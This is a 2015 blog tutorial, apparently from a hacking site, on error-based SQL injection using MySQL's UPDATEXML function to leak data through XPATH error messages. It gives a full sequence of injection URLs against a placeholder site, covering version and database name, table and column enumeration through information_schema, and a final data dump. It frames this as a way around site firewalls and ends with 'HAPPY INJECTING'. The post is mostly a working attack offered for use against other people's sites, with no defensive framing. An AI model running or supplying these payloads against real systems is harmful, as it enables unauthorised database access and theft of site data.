Social Icons

Wednesday 15 July 2015

XPATH Injection Using UPDATEXML



XPATH Injection Using UPDATEXML
After the Discussion About XPATH Injection Using ExtractValue
Now Let's come to the Next Part. in This Tutorial you Will Learn About XPATH Injection Using UPDATEXML .
Each Site use Different Firewalls To Protect their Databases.in XPATH injection Some sites use UPDATEXML and they have Block The ExtractValue Function.So we can use there XPATH Injection With UPADTEXML.

Now Let's Start Our Injecting Manually.We are injecting A Site and Then we Execute our UNION BASED Query But we Do not Get Any OutPut There so We Will use There XPATH Injection.
For Example here is our UNION BASED Query.

http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -

After Executing This Query we Do not Get any OUTPUT or Sometimes we Got This Type OF Error
"The used SELECT statements have a different number of columns"
so we will Use There XPATH Injection for injecting the DATABASE
So let's try To Get The Version Using XPATH Injection With UPDATEXML query.
our XPATH Query will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -

After Executing The Query we Got this Type of Output :


XPATH syntax error: ':VERSION_HERE'

So now Let's Check The Current Database Name and Our Query for Getting The Current Database Will be:

 http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -

and we Got This Output:
XPATH syntax error: ':CURRENT_DATABASE_NAME_HERE'

Now Let's Continue our Injecting to Getting The Tables in the Current Database.
So This one Will be Our Query for the Tables:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -

And After Executing The Query we Will Got This output:

XPATH syntax error: ':SOME_TABLE_NAME_HERE'

as we are injecting with XPATH injection so we will increase the LIMIT for getting other Tables in the current Database.
So After Getting the Tables From the current Database Our Next Step is to get The COLUMNS From TABLES.
And our Query for Getting Columns Will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)),null)-- -

we will Increase the Limit for getting Other columns in the Targeted Table.
So After Getting The columns FINAL PART is to dump Data from the columns.
And Our FINAL Query will be :
http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(OUR_COLUMN_NAME_HERE) from OUR_TABLE_NAME_HERE)),null)-- -

HAPPY INJECTING !!!

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee


0 comments:

Post a Comment